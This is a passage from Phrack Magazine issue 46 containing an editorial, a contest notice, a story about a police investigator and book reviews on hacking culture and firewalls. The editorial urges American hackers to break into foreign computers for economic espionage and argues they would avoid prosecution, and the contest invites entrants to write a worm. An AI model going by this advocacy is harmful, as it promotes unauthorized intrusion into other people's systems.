six-figures this tax year. I've consulted for telephone companies,
|
|||
|
governments, aerospace, financial institutions, oil companies (the list
|
|||
|
goes on...) and quite frankly I don't do anything even remotely illegal.
|
|||
|
In fact, one recent and quite prominent quote from me was "I only
|
|||
|
hack for money."
|
|||
|
|
|||
|
Now, about the silent majority of "honest people" like yourself that you
|
|||
|
have so self-rightously chosen to represent...
|
|||
|
|
|||
|
I've been using the net since the early 80's (arpa-days) initially
|
|||
|
through a rms granted guest account on MIT-OZ. I've continued to
|
|||
|
work with other Internet Providers to cover the asses of the so-called
|
|||
|
"honest people" of which you include yourself.
|
|||
|
|
|||
|
Now, in my view, if it were not for people like us, who consistently
|
|||
|
expose and pinpoint weaknesses in the operating systems and networking
|
|||
|
technologies that you use for your "fun and enjoyment" and that I use
|
|||
|
for MY JOB, you would continue to be at serious risk. But, perhaps
|
|||
|
ignorance is truly bliss, and if so, then Keith, you are probably one of
|
|||
|
the happiest people on this fine planet.
|
|||
|
|
|||
|
Now, per your request, I may just go jump in a river, as the one near
|
|||
|
my house is quite nice, and it is almost 100 degrees here in Texas.
|
|||
|
I only ask that you do me one small favor:
|
|||
|
|
|||
|
print out 500 copies of this letter, roll them up into a paper fist,
|
|||
|
and shove them into any orifice on your person that meets your criteria
|
|||
|
as deserving.
|
|||
|
|
|||
|
** I guess this guy doesn't like me...or you **
|
|||
|
|
|||
|
EDITORIAL ABUSE ENDS]
|
|||
|
-----------------------------------------------------------------------------
|
|||
|
|
|||
|
==Phrack Magazine==
|
|||
|
|
|||
|
Volume Five, Issue Forty-Six, File 2a of 28
|
|||
|
|
|||
|
****************************************************************************
|
|||
|
|
|||
|
Phrack Editorial
|
|||
|
|
|||
|
|
|||
|
If you aren't from America, this editorial really isn't meant for you,
|
|||
|
so read on with warning, or go on to the next file.
|
|||
|
|
|||
|
-----------------------------------------------------------------------------
|
|||
|
|
|||
|
Stupid hackers.
|
|||
|
|
|||
|
We've got to do something to clean up our image.
|
|||
|
|
|||
|
We truly are "America's Most Valuable Resource," as ex-CIA spook Robert
|
|||
|
Steele has said so many times. But if we don't stop screwing over our own
|
|||
|
countrymen, we will never be looked at as anything more than common
|
|||
|
gutter trash. Hacking computers for the sole purpose of collecting
|
|||
|
systems like space-age baseball cards is stupid, pointless and can only
|
|||
|
lead to a quick trip up the river.
|
|||
|
|
|||
|
Obviously, no one is going to stop hacking. I've been lucky in that I've
|
|||
|
found people willing to pay me to hack for them rather than against
|
|||
|
them, but not everyone can score such a coup. What kind of alternative
|
|||
|
can the rest of the community have?
|
|||
|
|
|||
|
Let's say that everyone was given an opportunity to hack without any
|
|||
|
worry of prosecution with free access to a safe system to hack from,
|
|||
|
with the only catch being that you could not hack certain systems.
|
|||
|
Military, government, financial, commercial and university systems would
|
|||
|
all still be fair game. Every operating system, every application, every
|
|||
|
network type all open to your curious minds.
|
|||
|
|
|||
|
Would this be a good alternative? Could you follow a few simple
|
|||
|
guidelines for the offer of virtually unlimited hacking with no worry of
|
|||
|
governmental interference?
|
|||
|
|
|||
|
Where am I going with this?
|
|||
|
|
|||
|
Right now we are at war. You may not realize it, but we all feel the
|
|||
|
implications of this war, because it's a war with no allies, and
|
|||
|
enormous stakes. It's a war of economics.
|
|||
|
|
|||
|
The very countries that shake our hands over the conference tables of
|
|||
|
NATO and the United Nations are picking our pockets. Whether it be the
|
|||
|
blatant theft of American R&D by Japanese firms, or the clandestine and
|
|||
|
governmentally-sanctioned bugging of Air France first-class seating, or
|
|||
|
the cloak-and-dagger hacking of the SWIFT network by the German BND's
|
|||
|
Project Rahab, America is getting fucked.
|
|||
|
|
|||
|
Every country on the planet is coming at us. Let's face it, we are the
|
|||
|
leaders in everything. Period. Every important discovery in this
|
|||
|
century has been by an American or by an American company. Certainly
|
|||
|
other countries have better profited by our discoveries, but
|
|||
|
nonetheless, we are the world's think-tank.
|
|||
|
|
|||
|
So, is it fair that we keep getting shafted by these so-called "allies?"
|
|||
|
Is it fair that we sit idly by, like some old hound too lazy to scratch
|
|||
|
at the ticks sucking out our life's blood by the gallon? Hell no.
|
|||
|
|
|||
|
Let's say that an enterprising group of computer hackers decided to
|
|||
|
strike back. Using equipment bought legally, using network connections
|
|||
|
obtained and paid for legally, and making sure that all usage was
|
|||
|
tracked and paid for, this same group began a systematic attack of
|
|||
|
foreign computers. Then, upon having gained access, gave any and all
|
|||
|
information obtained to American corporations and the Federal
|
|||
|
government.
|
|||
|
|
|||
|
What laws would be broken? Federal Computer Crime Statutes specifically
|
|||
|
target so-called "Federal Interest Computers." (ie: banks,
|
|||
|
telecommunications, military, etc.) Since these attacks would involve
|
|||
|
foreign systems, those statutes would not apply. If all calls and
|
|||
|
network connections were promptly paid for, no toll-fraud or other
|
|||
|
communications related laws would apply.
|
|||
|
|
|||
|
International law is so muddled that the chances of getting extradited
|
|||
|
by a country like France for breaking into systems in Paris from Albuquerque
|
|||
|
is slim at best. Even more slim when factoring in that the information
|
|||
|
gained was given to the CIA and American corporations.
|
|||
|
|
|||
|
Every hacking case involving international breakins has been tried and
|
|||
|
convicted based on other crimes. Although the media may spray headlines
|
|||
|
like "Dutch Hackers Invade Internet" or "German Hackers Raid NASA,"
|
|||
|
those hackers were tried for breaking into systems within THEIR OWN
|
|||
|
COUNTRIES...not somewhere else. 8lgm in England got press for hacking
|
|||
|
world-wide, but got nailed hacking locally. Australia's Realm Hackers:
|
|||
|
Phoenix, Electron & Nom hacked almost exclusively other countries, but
|
|||
|
use of AT&T calling cards rather than Australian Telecom got them a charge
|
|||
|
of defrauding the Australian government. Dutch hacker RGB got huge press
|
|||
|
hacking a US military site and creating a "dquayle" account, but got
|
|||
|
nailed while hacking a local university. The list goes on and on.
|
|||
|
|
|||
|
I asked several people about the workability of my proposal. Most
|
|||
|
seemed to concur that it was highly unlikely that anyone would have to
|
|||
|
fear any action by American law enforcement, or of extradition to
|
|||
|
foreign soil to face charges there. The most likely form of retribution
|
|||
|
would be eradication by agents of that government. (Can you say,
|
|||
|
"Hagbard?")
|
|||
|
|
|||
|
Well, I'm willing to take that chance, but only after I get further
|
|||
|
information from as many different sources as I can. I'm not looking
|
|||
|
for anyone to condone these actions, nor to finance them. I'm only
|
|||
|
interested in any possible legal action that may interfere with my
|
|||
|
freedom.
|
|||
|
|
|||
|
I'm drafting a letter that will be sent to as many different people as
|
|||
|
possible to gather a fully-formed opinion on the possible legal
|
|||
|
ramifications of such an undertaking. The letter will be sent to the FBI,
|
|||
|
SS, CIA, NSA, NRO, Joint Chiefs, National Security Council, Congress,
|
|||
|
Armed Forces, members of local and state police forces, lawyers, professors,
|
|||
|
security professionals, and anyone else I can think of. Their answers
|
|||
|
will help fully form my decision, and perhaps if I pass along their
|
|||
|
answers, will help influence other American hackers.
|
|||
|
|
|||
|
We must take the offensive, and attack the electronic borders of other
|
|||
|
countries as vigorously as they attack us, if not more so. This is
|
|||
|
indeed a war, and America must not lose.
|
|||
|
|
|||
|
->Erik Bloodaxe...Hacker...American.
|
|||
|
|
|||
|
---------------------------
|
|||
|
|
|||
|
Ok, so maybe that was a bit much. But any excuse to hack without fear
|
|||
|
should be reason enough to exert a bit of Nationalism.
|
|||
|
|
|||
|
I'd much rather be taken out by the French in some covert operation and
|
|||
|
go out a martyr, than catch AIDS after being raped by the Texas
|
|||
|
Syndicate in the metal shop of some Federal Prison. Wouldn't you?
|
|||
|
==Phrack Magazine==
|
|||
|
|
|||
|
Volume Five, Issue Forty-Six, File 3 of 28
|
|||
|
|
|||
|
|
|||
|
// // /\ // ====
|
|||
|
// // //\\ // ====
|
|||
|
==== // // \\/ ====
|
|||
|
|
|||
|
/\ // // \\ // /=== ====
|
|||
|
//\\ // // // // \=\ ====
|
|||
|
// \\/ \\ // // ===/ ====
|
|||
|
|
|||
|
PART I
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
!! NEW PHRACK CONTEST !!
|
|||
|
|
|||
|
Phrack Magazine is sponsoring a programming contest open to anyone
|
|||
|
who wishes to enter.
|
|||
|
|
|||
|
Write the Next Internet Worm! Write the world's best X Windows wardialer!
|
|||
|
Code something that makes COPS & SATAN look like high school Introduction
|
|||
|
to Computing assignments. Make the OKI 1150 a scanning, tracking, vampire-
|
|||
|
phone. Write an NLM! Write a TSR! Write a stupid game! It doesn't
|
|||
|
matter what you write, or what computer it's for! It only matters that you
|
|||
|
enter!
|
|||
|
|
|||
|
Win from the following prizes:
|
|||
|
|
|||
|
Computer Hardware & Peripherals
|
|||
|
System Software
|
|||
|
Complete Compiler packages
|
|||
|
CD-ROMS
|
|||
|
T-Shirts
|
|||
|
Magazine Subscriptions
|
|||
|
and MANY MORE!
|
|||
|
|
|||
|
STOP CRACKING PASSWORDS AND DO SOMETHING WITH YOUR LIFE!
|
|||
|
|
|||
|
Enter the PHRACK PROGRAMMING CONTEST!
|
|||
|
|
|||
|
The rules are very simple:
|
|||
|
|
|||
|
1) All programs must be original works. No submissions of
|
|||
|
previously copyrighted materials or works prepared by
|
|||
|
third parties will be judged.
|
|||
|
|
|||
|
2) All entries must be sent in as source code only. Any programming
|
|||
|
language is acceptable. Programs must compile and run without
|
|||
|
any modifications needed by the judges. If programs are specific
|
|||
|
to certain platforms, please designate that platform. If special
|
|||
|
hardware is needed, please specify what hardware is required.
|
|||
|
If include libraries are needed, they should be submitted in addition
|
|||
|
to the main program.
|
|||
|
|
|||
|
3) No virii accepted. An exception may be made for such programs that
|
|||
|
are developed for operating systems other than AMIGA/Dos, System 7,
|
|||
|
MS-DOS (or variants), or OS/2. Suitable exceptions could be, but are not
|
|||
|
limited to, UNIX (any variant), VMS or MVS.
|
|||
|
|
|||
|
4) Entries may be submitted via email or magnetic media. Email should be
|
|||
|
directed to phrack@well.com. Tapes, Diskettes or other storage
|
|||
|
media should be sent to
|
|||
|
|
|||
|
Phrack Magazine
|
|||
|
603 W. 13th #1A-278
|
|||
|
Austin, TX 78701
|
|||
|
|
|||
|
5) Programs will be judged by a panel of judges based on programming skill
|
|||
|
displayed, originality, usability, user interface, documentation,
|
|||
|
and creativity.
|
|||
|
|
|||
|
6) Phrack Magazine will make no claims to the works submitted, and the
|
|||
|
rights to the software are understood to be retained by the program
|
|||
|
author. However, by entering, the Author thereby grants Phrack Magazine
|
|||
|
permission to reprint the program source code in future issues.
|
|||
|
|
|||
|
7) All Entries must be received by 12-31-94. Prizes to be awarded by 3-1-95.
|
|||
|
|
|||
|
-------------------------INCLUDE THIS FORM WITH ENTRY-------------------------
|
|||
|
|
|||
|
Author:
|
|||
|
|
|||
|
Email Address:
|
|||
|
|
|||
|
Mailing Address:
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Program Name:
|
|||
|
|
|||
|
|
|||
|
Description:
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Hardware & Software Platform(s) Developed For:
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Special Equipment Needed (modem, ethernet cards, sound cards, etc):
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Other Comments:
|
|||
|
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
COMPUTER COP PROPHILE
|
|||
|
FOLLOW-UP REPORT
|
|||
|
|
|||
|
LT. WILLIAM BAKER
|
|||
|
JEFFERSON COUNTY POLICE
|
|||
|
|
|||
|
by
|
|||
|
|
|||
|
The Grimmace
|
|||
|
|
|||
|
|
|||
|
In PHRACK 43, I wrote an article on the life and times
|
|||
|
of a computer cop operating out of the Jefferson County Police
|
|||
|
Department in Louisville, Kentucky. In the article, I included
|
|||
|
a transcript of a taped interview with him that I did after
|
|||
|
socially engineering my way through the cop-bureaucracy in his
|
|||
|
department. At the time I thought it was a hell of an idea and a
|
|||
|
lot of PHRACK readers probably got a good insight into how the
|
|||
|
"other side" thinks.
|
|||
|
|
|||
|
However, I made the terminal mistake of underestimating
|
|||
|
the people I was dealing with by a LONG shot and felt that I
|
|||
|
should write a short follow-up on what has transpired since that
|
|||
|
article was published in PHRACK 43.
|
|||
|
|
|||
|
A lot of the stuff in the article about Lt. Baker was
|
|||
|
obtained by an attorney I know who has no reason to be friendly
|
|||
|
to the cops. He helped me get copies of court transcripts which
|
|||
|
included tons of information on Baker's training and areas of
|
|||
|
expertise. Since the article, the attorney has refused to talk
|
|||
|
to me and, it appears, that he's been identified as the source
|
|||
|
of assistance in the article and all he will say to me is that
|
|||
|
"I don't want any more trouble from that guy...forget where you
|
|||
|
left my phone number." Interesting...no elaboration...hang up.
|
|||
|
|
|||
|
As I recall, the PHRACK 43 issue came out around
|
|||
|
November 17th. On November 20th, I received a telephone call
|
|||
|
where I was living at the home of a friend of mine from Lt.
|
|||
|
Baker who laughingly asked me if I needed any more information
|
|||
|
for any "future articles". I tried the "I don't know what
|
|||
|
you're talking about" scam at which time he read to me my full
|
|||
|
name, date of birth, social security number, employer, license
|
|||
|
number of my car, and the serial number from a bicycle I just
|
|||
|
purchased the day before. I figured that he'd run a credit
|
|||
|
history on me, but when I checked, there had been no inquiries
|
|||
|
on my accounts for a year. He told me the last 3 jobs I'd held
|
|||
|
and where I bought my groceries and recited a list of BBSs I was
|
|||
|
on (two of which under aliases other than The Grimmace).
|
|||
|
|
|||
|
This guy had a way about him that made a chill run up my
|
|||
|
spine and never once said the first threatening or abusive thing
|
|||
|
to me. I suppose I figured that the cops were all idiots and
|
|||
|
that I'd never hear anything more about the article and go on to
|
|||
|
write some more about other computer cops using the same method.
|
|||
|
I've now decided against it.
|
|||
|
|
|||
|
I got the message...and the message was "You aren't the
|
|||
|
only one who can hack out information." I'd always expected to
|
|||
|
get the typical "cop treatment" if I ever got caught doing
|
|||
|
anything, but I think this was worse. Hell, I never know where
|
|||
|
the guy's gonna show up next. I've received cryptic messages on
|
|||
|
the IRC from a variety of accounts and servers all over the
|
|||
|
country and on various "private" BBSs and got one on my birthday
|
|||
|
on my Internet account...it traced back to an anonymous server
|
|||
|
somewhere in the bowels of UCLA. I don't know anyone at UCLA
|
|||
|
and the internet account I have is an anonymous account actually
|
|||
|
owned by another friend of mine.
|
|||
|
|
|||
|
I think the point I'm trying to make is that all of us
|
|||
|
have to be aware of how the cops think in order to protect
|
|||
|
ourselves and the things we believe in. But...shaking the
|
|||
|
hornet's nest in order to see what comes out maybe isn't the
|
|||
|
coolest way to investigate.
|
|||
|
|
|||
|
Like I wrote in my previous article, we've all gotten a
|
|||
|
big laugh from keystone cops like Foley and Golden, but things
|
|||
|
may be changing. Local and federal agencies are beginning to
|
|||
|
cooperate on a regular basis and international agencies are also
|
|||
|
beginning to join the party.
|
|||
|
|
|||
|
The big push to eradicate child-pornography has led to a number of
|
|||
|
hackers being caught in the search for the "dirty old men" on the Internet.
|
|||
|
Baker was the Kentucky cop who was singularly responsible for the bust of the
|
|||
|
big kiddie-porn FSP site at the University of Birmingham in England back
|
|||
|
in April and got a lot of press coverage about it. But I had personally
|
|||
|
never considered that a cop could hack his way into a password-protected
|
|||
|
FSP site. And why would he care about something happening on the other
|
|||
|
side of the world? Hackers do it, but not cops...unless the cops are
|
|||
|
hackers. Hmmm...theories anyone?
|
|||
|
|
|||
|
I don't live in Louisville anymore...not because of
|
|||
|
Baker, but because of some other problems, but I still look over
|
|||
|
my shoulder. It would be easier if the guy was a prick, but I'm
|
|||
|
more paranoid of the friendly good-ole boy than the raving
|
|||
|
lunatic breaking in our front doors with a sledge hammer. I
|
|||
|
always thought we were safe because we knew so much more than
|
|||
|
the people chasing us. I'm not so certain of that anymore.
|
|||
|
|
|||
|
So that's it. I made the mistakes of 1) probably
|
|||
|
embarrassing a guy who I thought would never be able to touch me
|
|||
|
and 2), drawing attention to myself. A hacker's primary
|
|||
|
protection lies in his anonymity...those who live the high
|
|||
|
profiles are the ones who take the falls and, although I haven't
|
|||
|
fallen yet, I keep having the feeling that I'm standing on the
|
|||
|
edge and that I know the guy sneaking up behind me.
|
|||
|
|
|||
|
From the shadows--
|
|||
|
The Grimmace
|
|||
|
[HsL - RAt - UQQ]
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
!! PHRACK READS !!
|
|||
|
|
|||
|
"Cyberia" by Douglas Rushkoff
|
|||
|
Review by Erik Bloodaxe
|
|||
|
|
|||
|
Imagine a book about drugs written by someone who never inhaled.
|
|||
|
Imagine a book about raves written by someone saw a flyer once.
|
|||
|
Imagine a book about computers by someone who someone who thinks
|
|||
|
a macintosh is complex.
|
|||
|
|
|||
|
Imagine an author trying to make a quick buck by writing about something
|
|||
|
his publisher said was hot and would sell.
|
|||
|
|
|||
|
And there you have Cyberia, by Douglas Rushkoff.
|
|||
|
|
|||
|
I have got to hand it to this amazing huckster Rushkoff, though. By
|
|||
|
publishing Cyberia, and simultaneously putting out "The Gen X Reader,"
|
|||
|
(which by the way is unequaled in its insipidness), he has covered all
|
|||
|
bases for the idiot masses to devour at the local bookseller.
|
|||
|
|
|||
|
Rushkoff has taken it upon himself to coin new terms such as
|
|||
|
"Cyberia," the electronic world we live in; "Cyberians," the people
|
|||
|
who live and play online; etc...
|
|||
|
|
|||
|
Like we needed more buzzwords to add to a world full of "Infobahns"
|
|||
|
"console cowboys," and "phrackers." Pardon me while I puke.
|
|||
|
|
|||
|
The "interviews" with various denizens of Rushkoff's "Cyberia" come off
|
|||
|
as fake as if I were to attempt to publish an interview with Mao Tse Tung
|
|||
|
in the next issue of Phrack.
|
|||
|
|
|||
|
We've got ravers talking on and on about "E" and having deep conversations
|
|||
|
about smart drugs and quantum physics. Let's see: in the dozens of raves
|
|||
|
I've been to in several states the deepest conversation that popped
|
|||
|
up was "uh, do you have any more of that acid?" and "this mix is cool."
|
|||
|
And these conversations were from the more eloquent of the nearly all under
|
|||
|
21 crowd that the events attracted. Far from quantum physicians.
|
|||
|
And beyond that, its been "ecstasy" or "X" in every drug culture I've wandered
|
|||
|
through since I walked up the bar of Maggie Mae's on Austin, Texas' 6th Street
|
|||
|
in the early 80's with my fake id and bought a pouch of the magic elixir over
|
|||
|
the counter from the bartender (complete with printed instructions).
|
|||
|
NOT "E." But that's just nit-picking.
|
|||
|
|
|||
|
Now we have the psychedelic crowd. Listening to the "Interviews" of these
|
|||
|
jokers reminds me of a Cheech and Chong routine involving Sergeant Stedanko.
|
|||
|
"Some individuals who have smoked Mary Jane, or Reefer oftimes turn to
|
|||
|
harder drugs such as LSD." That's not a quote from the book, but it may
|
|||
|
as well be. People constantly talk about "LSD-this" and "LSD-that."
|
|||
|
Hell, if someone walked into a room and went on about how he enjoyed his
|
|||
|
last "LSD experience" the way these people do, you'd think they were
|
|||
|
really really stupid, or just a cop. "Why no, we've never had any of
|
|||
|
that acid stuff. Is it like LSD?" Please.
|
|||
|
|
|||
|
Then there are the DMT fruitcakes. Boys and girls, DMT isn't being sold
|
|||
|
on the street corner in Boise. In fact, I think it would be easier for most
|
|||
|
people to get a portable rocket launcher than DMT. Nevertheless, in every
|
|||
|
fucking piece of tripe published about the "new psychedlicia" DMT is
|
|||
|
splattered all over it. Just because Terrance Fucking McKenna
|
|||
|
saw little pod people, does not mean it serves any high position
|
|||
|
in the online community.
|
|||
|
|
|||
|
And Hackers? Oh fuck me gently with a chainsaw, Douglas. From Craig Neidorf's
|
|||
|
hacker Epiphany while playing Adventure on his Atari VCS to Gail
|
|||
|
Thackeray's tearful midnight phonecall to Rushkoff when Phiber Optik
|
|||
|
was raided for the 3rd time. PLEASE! I'm sure Gail was up to her eyebrows
|
|||
|
in bourbon, wearing a party hat and prank calling hackers saying "You're next,
|
|||
|
my little pretty!" Not looking for 3rd-rate schlock journalists to whine to.
|
|||
|
|
|||
|
The Smart Drink Girl? The Mondo House? Gee...how Cyber. Thanks, but
|
|||
|
no thanks.
|
|||
|
|
|||
|
I honestly don't know if Rushkoff really experienced any of this nonsense,
|
|||
|
or if he actually stumbled on a few DMT crystals and smoked this
|
|||
|
reality. Let's just say, I think Mr. Rushkoff was absent the day
|
|||
|
his professor discussed "Creative License in Journalism" and just decided
|
|||
|
to wing it.
|
|||
|
|
|||
|
Actually, maybe San Francisco really is like this. But NOWHERE else on
|
|||
|
the planet can relate. And shit, if I wanted to read a GOOD San
|
|||
|
Francisco book, I'd reread Armistead Maupin's "Tales of the City."
|
|||
|
This book should have been called "Everything I Needed to Know About
|
|||
|
Cyber-Culture I Learned in Mondo-2000."
|
|||
|
|
|||
|
Seriously...anyone who reads this book and finds anything remotely
|
|||
|
close to the reality of the various scenes it weakly attempts to
|
|||
|
cover needs to email me immediately. I have wiped my ass with
|
|||
|
better pulp.
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
BOOK REVIEW: INFORMATION WARFARE
|
|||
|
CHAOS ON THE ELECTRONIC SUPERHIGHWAY
|
|||
|
By Winn Schwartau
|
|||
|
|
|||
|
INFORMATION WARFARE - CHAOS ON THE ELECTRONIC SUPERHIGHWAY
|
|||
|
By Winn Schwartau. (C)opyright 1994 by the author
|
|||
|
Thunder's Mouth Press, 632 Broadway / 7th floor / New York, NY 10012
|
|||
|
ISBN 1-56025-080-1 - Price $22.95
|
|||
|
Distributed by Publishers Group West, 4065 Hollis St. / Emeryville, CA 94608
|
|||
|
(800) 788-3123
|
|||
|
|
|||
|
Review by Scott Davis (dfox@fennec.com)
|
|||
|
(from tjoauc1-4 ftp: freeside.com /pub/tjoauc)
|
|||
|
|
|||
|
If you only buy one book this year, make sure it is INFORMATION WARFARE!
|
|||
|
In my 10+ years of existing in cyberspace and seeing people and organizations
|
|||
|
debate, argue and contemplate security issues, laws, personal privacy,
|
|||
|
and solutions to all of these issues...and more, never have I seen a more
|
|||
|
definitive publication. In INFORMATION WARFARE, Winn Schwartau simply
|
|||
|
draws the line on the debating. The information in this book is hard-core,
|
|||
|
factual documentation that leaves no doubt in this reader's mind that
|
|||
|
the world is in for a long, hard ride in regards to computer security.
|
|||
|
The United States is open to the world's electronic terrorists.
|
|||
|
When you finish reading this book, you will find out just how open we are.
|
|||
|
|
|||
|
Mr. Schwartau talks about industrial espionage, hacking, viruses,
|
|||
|
eavesdroping, code-breaking, personal privacy, HERF guns, EMP/T bombs,
|
|||
|
magnetic weaponry, and the newest phrase of our generation...
|
|||
|
"Binary Schizophrenia". He exposes these topics from all angles. If you
|
|||
|
spend any amount of time in Cyberspace, this book is for you.
|
|||
|
|
|||
|
How much do you depend on technology?
|
|||
|
|
|||
|
ATM machines, credit cards, toasters, VCR's, televisions, computers,
|
|||
|
telephones, modems...the list goes on. You use technology and computers
|
|||
|
and don't even know it! But the point is...just how safe are you from
|
|||
|
invasion? How safe is our country's secrets? The fact is - they are NOT
|
|||
|
SAFE! How easy is it for someone you don't know to track your every move
|
|||
|
on a daily basis? VERY EASY! Are you a potential victim to fraud,
|
|||
|
breech of privacy, or general infractions against the way you carry
|
|||
|
on your daily activities? YES! ...and you'd never guess how vulnerable
|
|||
|
we all are!
|
|||
|
|
|||
|
This book will take you deep into places the government refuses to
|
|||
|
acknowledge. You should know about INFORMATION WARFARE. Order your
|
|||
|
copy today, or pick it up at your favorite book store. You will not
|
|||
|
regret it.
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
_Firewalls and Internet Security: Repelling the Wily Hacker_
|
|||
|
|
|||
|
William R. Cheswick <ches@research.att.com>
|
|||
|
Steven M. Bellovin <smb@research.att.com>
|
|||
|
|
|||
|
Addison-Wesley, ISBN 0-201-63357-4
|
|||
|
306 + XIV = 320 pages
|
|||
|
(Printed on recycled paper)
|
|||
|
|
|||
|
A-Somewhat-Less-Enthusiastic-Review
|
|||
|
|
|||
|
Reviewed by Herd Beast
|
|||
|
|
|||
|
The back of this book claims that, "_Firewalls and Internet Security_
|
|||
|
gives you invaluable advice and practical tools for protecting your
|
|||
|
organization's computers from the very real threat of hacker attacks."
|
|||
|
That is true. The authors also add something from their knowledge of
|
|||
|
these hacker attacks. The book can be roughly separated into two
|
|||
|
parts: Firewalls, and, you guessed it: Internet Security. That is
|
|||
|
how I see it. The book itself is divided into four parts (Getting
|
|||
|
Started, Building Your Own Firewall, A Look Back & Odds and Ends),
|
|||
|
three appendixes, a bibliography, a list of 42 bombs and an index.
|
|||
|
|
|||
|
The book starts with overall explanations and an overview of the
|
|||
|
TCP/IP protocol. More than an overview of the actual TCP/IP protocol,
|
|||
|
it is a review of services often used with that protocol, and the
|
|||
|
security risks they pose. In that chapter the authors define
|
|||
|
"bombs" -- as particularly serious security risks. Despite that fact,
|
|||
|
and the tempting bomb list in the end, this book is not a guide for
|
|||
|
someone with passing knowledge of Internet security who wants to learn
|
|||
|
more explicit details about holes. It is, in the authors' words, "not
|
|||
|
a book on how to administer a system in a secure fashion."
|
|||
|
|
|||
|
|
|||
|
FIREWALLS (Including the TCP/IP overview: pages 19-131)
|
|||
|
|
|||
|
What is a firewall and how is it built?(*) If you don't know that,
|
|||
|
then definitely get this book. The Firewalls chapter is excellent
|
|||
|
even for someone with a passing knowledge of firewalls or general
|
|||
|
knowledge of what they set out to accomplish. You might still
|
|||
|
learn more.
|
|||
|
|
|||
|
In the Firewalls chapter, the authors explain the firewall philosophy
|
|||
|
and types of firewalls. Packet-filtering gateways rely on rule-based
|
|||
|
packet filtering to protect the gateway from various types of attacks.
|
|||
|
You can filter everything and achieve the same effect of disconnecting
|
|||
|
from the Internet, you can filter everything from misbehaving sites,
|
|||
|
you can allow only mail in, and so on. An application-level gateway
|
|||
|
relies on the applications set on the firewall. Rather then let a
|
|||
|
router filter traffic based on rules, one can strip a machine clean
|
|||
|
and only run desired services -- and even then, more secure versions
|
|||
|
of those services can be run. Circuit-level gateways relay data
|
|||
|
between the gateway and other networks. The relay programs copy
|
|||
|
data from inside the firewall to the outside, and log their activity.
|
|||
|
Most firewalls on the Internet are a combination of these gateways.
|
|||
|
|
|||
|
Next, the authors explain how to build an application-level gateway
|
|||
|
based on the work they have done with the research.att.com gateways.
|
|||
|
As mentioned, this chapter is indeed very good. They go over setting
|
|||
|
up the firewall machines, router configuration for basic packet
|
|||
|
filtering (such as not allowing Internet packets that appear to come
|
|||
|
from inside your network). They show, using the software on the
|
|||
|
AT&T gateway as example, the general outline of proxies and give some
|
|||
|
useful advise. That chapter is very interesting; reading it with Bill
|
|||
|
Cheswick's (older) paper, "The Design of a Secure Internet Gateway" makes
|
|||
|
it even better. The examples given, like the NFS and X proxies run on the
|
|||
|
gateway, are also interesting by themselves.
|
|||
|
|
|||
|
|
|||
|
INTERNET SECURITY (pages 133-237)
|
|||
|
|
|||
|
Internet security is a misleading name. This part might also be
|
|||
|
called "Everything else." Most of it is a review of hacker attacks
|
|||
|
logged by AT&T's gateway probes, and of their experience with a hacker.
|
|||
|
But there is also a chapter dedicated to computer crime and the law --
|
|||
|
computer crime statutes, log files as evidence, the legalities of
|
|||
|
monitoring intruders and letting them keep their access after finding
|
|||
|
them, and the ethics of many actions performed on the Internet; plus
|
|||
|
an introduction to cryptography under Secure Communication over Insecure
|
|||
|
Networks. The later sections are good. The explanation of several
|
|||
|
encryption methods and short reviews of applications putting them to use
|
|||
|
(PEM, PGP and RIPEM) are clear (as clear as cryptography can get) and the
|
|||
|
computer crime sections are also good -- although I'm not a lawyer and
|
|||
|
therefore cannot really comment on it, and notes that look like "5 USC
|
|||
|
552a(b)(c)(10)" cause me to shudder. It's interesting to note that some
|
|||
|
administrative functions as presented in this book, what the authors call
|
|||
|
counter-intelligence (reverse fingers and rusers) and booby traps and fake
|
|||
|
password file are open for ethical debate. Perhaps they are not illegal,
|
|||
|
but counter-intelligence can surely ring the warning bells on the site being
|
|||
|
counter-fingered if that site itself is security aware.
|
|||
|
|
|||
|
That said, let's move to hackers. I refer to these as "hacker studies",
|
|||
|
or whatever, for lack of a better name. This is Part III (A Look
|
|||
|
Back), which contains the methods of attacks (social engineering,
|
|||
|
stealing passwords, etc), the Berferd incident (more on that later),
|
|||
|
and an analysis (statistical and otherwise) of the Bell Labs gateway
|
|||
|
logs.
|
|||
|
|
|||
|
Back to where we started, there is nothing new or innovative about
|
|||
|
these chapters. The Berferd hacker case is not new, it is mostly just
|
|||
|
uninteresting. The chapter is mostly a copy (they do state this) of
|
|||
|
Bill Cheswick's paper titled "A Night with Berferd, in Which a Cracker
|
|||
|
is Lured, Endured and Studied." The chapter concerning probes and
|
|||
|
door-knob twisting on the Internet (Traps, Lures, and Honey Pots)
|
|||
|
is mostly a copy (they do not state this) of Steven Bellovin's paper
|
|||
|
titled, "There Be Dragons". What do we learn from the hacker-related
|
|||
|
chapters? Let's take Berferd: The Sendmail DEBUG hole expert. After
|
|||
|
mailing himself a password file and receiving it with a space after
|
|||
|
the username, he tries to add accounts in a similar fashion. Cheswick
|
|||
|
calls him "flexible". I might have chosen another F-word. Next are
|
|||
|
the hacker logs. People finger. People tftp /etc/passwd. People try
|
|||
|
to rlogin as bin. There are no advanced attacks in these sections.
|
|||
|
Compared with the scary picture painted in the Firewalls chapter --
|
|||
|
that of the Bad Guy spoofing hostnames, flooding DNS caches, faking
|
|||
|
NFS packets and much more -- something must have gone wrong.(**)
|
|||
|
|
|||
|
Still, I cannot say that this information is totally useless. It is,
|
|||
|
as mentioned, old. It is available and was available since 1992
|
|||
|
on ftp://research.att.com:{/dist/internet_security,/dist/smb}. (***)
|
|||
|
|
|||
|
The bottom line is that this book is, in my opinion, foremost and upmost
|
|||
|
a Firewaller's book. The hacker section could have been condensed
|
|||
|
into Appendix D, a copy of the CERT advisory about computer attacks
|
|||
|
("Don't use guest/guest. Don't leave root unpassworded.") It really
|
|||
|
takes ignorance to believe that inexperienced hackers can learn "hacker
|
|||
|
techniques" and become mean Internet break-in machines just by reading
|
|||
|
_Firewalls and Internet Security_. Yes, even the chapter dedicated
|
|||
|
to trying to attack your own machine to test your security (The Hacker's
|
|||
|
